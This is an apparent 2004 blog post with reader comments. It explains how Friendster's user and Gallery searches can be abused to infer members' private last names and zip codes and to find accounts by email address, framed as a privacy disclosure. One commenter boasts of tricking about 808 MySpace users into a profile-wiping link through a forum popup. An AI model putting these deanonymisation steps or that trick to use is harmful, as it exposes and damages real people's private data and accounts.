10.02.04

Hacking Social Networks part II (Don't search private data)

This installment of Hacking Social Networks is about search and private data. The point we want to make is that public searches should never be allowed to return results based on private data. To be clear, we do not mean results that explicitly include private data, but results that, while only containing public data, are constraind by private data. Let's take three pieces of private data on Friendster: last name, zip, and email adress, and consider how they can be abused or discovered.

Last names in many social networks, including Friendster, are considered private data. To find the last name of someone on friendster we will use the user search feature. User search lets you search for people by first and last name. The user's profile reveals to you their first name and their user id (in the url). To abuse the user search, enter the user's first name, guess a last name and see if any of the returned users match the user we are interested in. This approach is reasonable because the distribution of last names is not even; it is in fact so uneven that one out of every one hundred people in the US have the last name Smith. The US Census Bureau provides us with the data. From this we see that after trying only twenty-eight last names we have a ten percent chance of having guessed the user's last name. As we go down the list the probability for each new name decreases so we have to try more and more names to increase our chance of getting a match. The 115th name gets us to twenty percent, 315th, thirty percent, 771th, forty percent, and so on. Clearly, this is too much to do by hand but not too much for a program to perform. Most last names can be discovered from Friendster profiles.

The second private data we consider is zip codes. Like last names, zip codes are not made available in profiles but are used as part of the Gallery search criteria. To perform this attack, first retreive the user id and location from a user's profile. Then, get all the zip codes for their location. For each zip code, change your location to that zip code, and perform a Gallery search for the user with the distance set to one mile*. Note which searches returned the user in question. Once all searches have been performed, you can deduce which zipcode the user acculy resides in using either a zip code map, which can be found in your phone book, or by looking at the distances between the zip codes.

*To search the Gallery with a distance of one mile you must save the page and edit the distance menu html to include 1 as a option.

Email addresses are the third data we discuss. There is no easy mapping from
user id to email address. Instead we do the opposite: find someone's Friendster account by email address. We have written about this once before, providing an example bookmarklet for finding people on Friendster. Besides the bookmarklet, we also have a program which generates reports of Friendster profiles by monitoring local network traffic. The privacy issue is: your email address, which most people use as if it is pseuodonymous, is no longer pseudonymous. Instead it is tightly coupled with your identity on any social network services you use.

Someone can post a personal ad on craigslist and check the picture and details of all the respondents before writing back. Suddenly, a total stranger knows what you look like, who your friends are, your gender and sexual orientation, what movies you like and how you spend your free time. This increase in transparency isn't evident when you sign up to these services.

Posted by moore at 10.02.04 13:11
Comments

Sweet! I'm responsible for an online group and have been sorting out ways of allowing families to handle some sort of match-making, but safety and privacy is key. This is a very nice object lesson in allowing users to selectively block info and the need for systems to respect the blocks.

Posted by: Scott Moore at 17.02.04 18:15

There is always a delicate balance between usefulness/value and risk. Social networks thrive on the usefulness factor, but they often fail to mention the risk. Thanks for pointing it out and making the details available.

Posted by: G at 20.02.04 01:51

Yes, yes, but what I want to know is how many degrees of separation I am for Orkut himself.

wg

Posted by: Wendy M. Grossman at 27.02.04 09:00

Myspace has a lot of securty problems..
recently there was a way to convert your profile into a band profile, by going to a link, that converted it, just for shits and giggles i thought it would be funny to see how many people I could convert.. it started out by sending people a link to the convert page in the mail on myspace, as long as they were on myspace, which they were cause it was the mail on myspace, if they clicked the link, there profile was converted to a band profile, deleteing all there info,, so i thought to my self, how could i get this out to the masses? well i thought poppup? but where does alot of people look? the forums.. so i made a .swf file that poppuped the link and embedded it into the forum topics,, sure enough, seconds later a crap load of people were complaing there profiles where changed.. well the mods caught on in about 5 minutes, but the damage was done,, i did a search on new bands,, there were 808, hmm,, yeah, well they are slowly returning every thing to normal,, ie: this doesnot work anymore, but it was fun while it lasted.. laters-- Tnrub Tsaot..

Posted by: Tnrub Tsaot.. at 07.05.04 01:17

hi! i was wondering if u came up with a better code to see if someone viewed my prof in friendster cuz the one u provided didnt work.

thanks

Posted by: mixielle at 30.07.04 19:54

In regards to your myspace hack, could you possibly point me in the right direction as to how I would go about finding information to set up a mailing script on my site?

Thanks.

Posted by: Emily at 16.09.04 13:23